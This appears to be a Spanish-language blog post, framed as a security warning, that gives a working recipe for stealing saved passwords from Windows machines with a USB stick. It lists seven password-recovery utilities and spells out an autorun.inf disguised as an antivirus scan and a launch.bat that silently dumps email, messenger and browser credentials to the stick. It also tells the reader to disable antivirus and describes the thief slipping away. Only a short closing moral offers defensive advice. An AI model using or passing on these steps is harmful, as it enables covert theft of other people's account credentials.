Robar las contraseñas del Messenger, correo y otros programas que corran en Windows puede ser tremendamente fácil si alguien accede a la máquina con un simple pendrive.
Conocer el procedimiento puede que te haga más consciente de la necesidad de mantener unos mínimos de seguridad en tu PC con Windows.
Así que te lo vamos a explicar.
CÓMO HACKEAR CLAVES EN WINDOWS CON UN PENDRIVE
Tan sencillo como conectar un pendrive a un puerto USB del ordenador de la víctima. Obviamente, el pendrive preparado de antemano con unas pocas utilidades y un par de modificaciones extremadamente sencillas.
Windows suele guardar las contraseñas que se utilizan habitualmente para utilizar el Messenger, Outlook (cuentas de correo), sitios a los que entras a través de un navegador y muchas otras. Por eso nunca deberías dejar que tus contraseñas se guarden en una máquina con sistema operativo Windows si a ella podría acceder otra persona.
Cualquier desaprensivo podría enchufar un pendrive equipado con los siguientes programas:
MailPassView.- Recupera contraseñas de Outlook Express, Microsoft Outlook 2002/2003/2007/2010, Windows Mail, Windows Live Mail, IncrediMail, Eudora, Netscape 6.x/7.x (salvo que la contraseña esté encriptada con una clave maestra), Mozilla Thunderbird (lo mismo que el anterior), Group Mail Free, Yahoo! Mail (cuando la clave está guardada en la aplicación Messenger), Hotmail/MSN mail (si la clave está guardada en el Live Messenger) y Gmail (si la clave está guardada por Gmail Notifier application, Google Desktop o Google Talk).
MessenPass.- Recupera contraseñas de MSN Messenger, Windows Messenger (en Windows XP), Windows Live Messenger (en Windows XP/Vista/7), Yahoo Messenger (versiones 5.x y 6.x), Google Talk, ICQ Lite 4.x/5.x/2003, AOL Instant Messenger v4.6 o menor, AIM 6.x, AIM Pro, Trillian, Trillian Astra, Miranda, GAIM/Pidgin, MySpace IM, PaltalkScene y Digsby.
Protected Storage PassView.- Recupera contraseñas de Outlook, Internet Explorer y MSN Explorer.
IE PassView.- Recupera todas las contraseñas que guarde de cualquier forma el navegador Internet Explorer.
PasswordFox.- Recupera todas las contraseñas guardadas en el navegador Mozilla Firefox.
ChromePass.- Recupera todas las contraseñas guardadas en el navegador Chrome o Chromium.
OperaPassView.- Recupera todas las contraseñas almacenadas en el navegador Opera.
En cualquier caso estos programas no pueden recuperar contraseñas si están encriptadas mediante una clave maestra, razón de más para utilizar esta funcionalidad como medio de protección.
ELABORACIÓN DEL PENDRIVE CON LAS HERRAMIENTAS
Es necesario desactivar temporalmente el antivirus para configurar el pendrive pues se producen, a veces, falsos positivos con estas utilidades.
1.- Descargar las 7 utilidades anteriores y copiar al pendrive solo los ejecutables (.exe).
2.- En el bloc de notas escribir lo siguiente:
[autorun]Guardar y renombrar a autorun.inf (cuidado que no quede con extensión .txt sino .inf). Copiar el archivo al pendrive.
open=launch.bat
ACTION= Ejecutar escaneado anti-virus
3.- Crear otro archivo con el bloc de notas en el que se escribe lo siguiente:
start mspass.exe /stext mspass.txt
start mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start PasswordFox.exe /stext PasswordFox.txt
start ChromePass.exe /stext ChromePass.txt
start OperaPassView.exe /stext OperaPassView.txt
Controlar que los nombres de los ejecutables en este texto coincidan (mayúsculas y minúsculas) con los de los nombres de los correspondientes archivos.
Guardar y renombrar a launch.bat
Copiar al pendrive.
UTILIZACIÓN DEL PENDRIVE
1.- Insertar el pendrive en un puerto USB. Como está configurado para auto-ejecutarse aparecerá una ventana emergente.
2.- En la ventana seleccionar la primera opción: "Ejecutar escaneado anti-virus".
3.- Las herramientas ahora estarán trabajando en un segundo plano de forma discreta y silenciosa. En realidad será cuestión de algunos segundos. Todas las contraseñas encontradas se almacenarán en archivos de texto en el propio pendrive.
4.- Ahora viene la parte en la que se extrae el pendrive, se guarda en el bolsillo y se aleja el ladrón disimuladamente. Ya con toda tranquilidad podrá examinarlo en su casa. Encontrará en los archivos de texto las contraseñas, cuentas de email y otros datos relacionados.
El asunto funciona perfectamente en Windows XP, Windows Vista y, las más de las veces, en Windows 7.
MORALEJA:
No dejes tu PC al alcance de cualquiera, procura no almacenar contraseñas en el disco duro o, si lo haces, que sea con algún procedimiento que las encripte. Lo de dejar de pensar en Windows y empezar a considerar, por ejemplo, Linux es también algo que deberías sopesar.
0 Response to "Cómo consiguen robar contraseñas en Windows con un pendrive"
Posting Komentar